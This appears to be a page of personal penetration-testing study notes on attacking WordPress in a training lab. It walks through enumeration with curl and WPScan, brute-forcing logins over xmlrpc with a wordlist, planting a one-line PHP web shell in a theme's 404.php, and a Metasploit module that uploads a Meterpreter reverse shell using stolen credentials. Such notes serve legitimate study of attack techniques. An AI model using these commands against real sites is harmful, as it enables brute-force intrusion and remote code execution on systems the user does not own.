About me

Wordpress Attacks

Discovery/Footprinting

  • Look into /robots.txt

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml

  • presence of the /wp-admin and /wp-content directories

Enumeration

curl -s https://blog.inlanefreight.local | grep WordPress
<meta name="generator" content="WordPress 5.8" /

  • themes

curl -s https://wehost.co.in/ | grep themes

  • plugins

curl -s https://wehost.co.in/ | grep plugins

Enumerating Users

  • login page can be found at /wp-login.php.

  • A valid username and an invalid password results in the following message:

  • an invalid username returns that the user was not found.

WPScan

sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token dEOFB<SNIP>
sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token dEOFB<SNIP>

Attacking WordPress

Login Bruteforce

  • The wp-login method will attempt to brute force the standard WordPress login page, while the xmlrpc method uses WordPress API to make login attempts through /xmlrpc.php.

    • The xmlrpc method is preferred as it’s faster.

sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local

Code Execution

system($_GET[0]);
curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id

PHP Meterpreter shell

use exploit/unix/webapp/wp_admin_shell_upload 
set rhosts blog.inlanefreight.local
set username john
set password firebird1
set lhost 10.10.14.15
set rhost 10.129.42.195
set VHOST blog.inlanefreight.local
 show options 
exploit
PreviousExtracting windows wifi passwordNextJoomla Attacks

Last updated